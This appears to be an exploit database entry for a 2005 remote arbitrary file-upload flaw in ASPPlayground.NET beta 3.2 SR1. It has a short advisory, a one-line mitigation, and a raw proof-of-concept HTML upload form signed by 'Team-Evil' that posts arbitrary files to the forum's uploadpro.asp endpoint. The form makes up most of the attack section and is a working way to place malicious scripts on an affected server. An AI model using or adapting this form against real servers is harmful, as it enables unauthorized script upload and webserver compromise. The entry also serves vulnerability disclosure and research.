header-logo
Suggest Exploit
vendor:
ASPPlayground.NET
by:
Team-Evil
7.5
CVSS
HIGH
Remote Arbitrary File-Upload Vulnerability
434
CWE
Product Name: ASPPlayground.NET
Affected Version From: beta 3.2 SR1
Affected Version To: beta 3.2 SR1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

ASP Playground Version beta 3.2 SR1 upload Arbitrary Files

ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability. Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly execute the scripts the affected server. This issue can ultimately help attackers gain unauthorized access in the context of the webserver.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate MIME type and that the application validates the contents of the uploaded file.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14070/info

ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.

Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly execute the scripts the affected server.

This issue can ultimately help attackers gain unauthorized access in the context of the webserver. 

http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=

refer to

http://www.example.com/forum/post.asp

*

ASP Playground html bug :
___________________________

<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
</title>

</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">

<form method="POST" action="http://www.example.com/forum/uploadpro.asp?

memori=&deletefile=&mode=" enctype="multipart/form-data"

onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1"

cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">

</td>
</tr>
</form>

</table>
</body>
<center><b>pOWERED By Team-Evil l8oo8l@gmail.com
</html>

Navigation

Suggest Exploit

Services By CQR